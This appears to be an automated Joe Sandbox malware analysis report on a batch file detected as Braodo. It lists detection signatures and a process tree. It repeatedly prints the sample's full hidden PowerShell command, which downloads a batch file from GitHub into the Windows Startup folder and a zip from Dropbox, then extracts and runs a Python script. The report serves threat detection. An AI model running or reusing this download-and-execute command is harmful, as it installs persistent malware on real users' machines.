Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
T3-03-17.bat

Overview

General Information

Sample name:T3-03-17.bat
Analysis ID:1640885
MD5:5b7a20fdae49559e8e2e1f10149f7f8f
SHA1:ee4d2ad920bb9790d8e88b563060ec99e2f1c9dc
SHA256:702bdafb828a5d8d050e97f1fd59bb10be70c9ec7eadedcf5738b9d14d06d887
Tags:batuser-JAMESWT_MHT
Infos:

Detection

Braodo
Score:100
Range:0 - 100
Confidence:100%

Signatures

Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Braodo
Yara detected Powershell download and execute
Drops script or batch files to the startup folder
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: PowerShell DownloadFile
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6928 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7052 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • python.exe (PID: 4576 cmdline: "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py MD5: A7F3026E4CF239F0A24A021751D17AE2)
        • cmd.exe (PID: 1428 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • cmd.exe (PID: 412 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 1520 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7424 cmdline: powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\prt.py" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
T3-03-17.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 7052JoeSecurity_Braodo_1Yara detected BraodoJoe Security
      Process Memory Space: powershell.exe PID: 7052JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_7052.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Execution from Suspicious Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py, CommandLine: "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py, CommandLine|base64offset|contains: , Image: C:\Users\Public\Document\python.exe, NewProcessName: C:\Users\Public\Document\python.exe, OriginalFileName: C:\Users\Public\Document\python.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7052, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py, ProcessId: 4576, ProcessName: python.exe
          Sigma detected: Parent in Public Folder Suspicious Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "ver", CommandLine: C:\Windows\system32\cmd.exe /c "ver", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py, ParentImage: C:\Users\Public\Document\python.exe, ParentProcessId: 4576, ParentProcessName: python.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "ver", ProcessId: 1428, ProcessName: cmd.exe
          Sigma detected: PowerShell DownloadFile
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.e
          Sigma detected: Powerup Write Hijack DLL
          Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7052, TargetFilename: C:\Users\Public\Document\Lib\ctypes\macholib\fetch_macholib.bat
          Sigma detected: Suspicious Program Location with Network Connections
          Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 34.117.59.81, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Document\python.exe, Initiated: true, ProcessId: 4576, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 54803
          Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
          Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7052, TargetFilename: C:\Users\Public\Document.zip
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7052, TargetFilename: C:\Users\Public\Document\python.exe
          Sigma detected: PowerShell Download Pattern
          Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.e
          Sigma detected: PowerShell Web Download
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.e
          Sigma detected: Suspicious PowerShell Download - PoshModule
          Source: Event LogsAuthor: Florian Roth (Nextron Systems): Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 38ecd40d-09fe-416a-9232-2203b8645b58 Host Application = powershell.exe -WindowStyle Hidden -Command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43amp;st=i6clmk71amp;dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force Engine Version = 5.1.19041.1682 Runspace ID = 079800f0-ce20-4e2f-aec2-9150bca6e3f3 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 38ecd40d-09fe-416a-9232-2203b8645b58 Host Application = powershell.exe -WindowStyle Hidden -Command [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43amp;st=i6clmk71amp;dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force Engine Version = 5.1.19041.1682 Runspace ID = 079800f0-ce20-4e2f-aec2-9150bca6e3f3 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID
          Sigma detected: Usage Of Web Request Commands And Cmdlets
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.e
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force" , CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6928, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.e

          Data Obfuscation

          barindex
          Sigma detected: Drops script at startup location
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7052, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-17T20:35:04.224776+010028411891A Network Trojan was detected192.168.2.549721140.82.121.3443TCP
          2025-03-17T20:35:05.501746+010028411891A Network Trojan was detected192.168.2.549722185.199.108.133443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\idlelib\Icons\README.txtJump to behavior
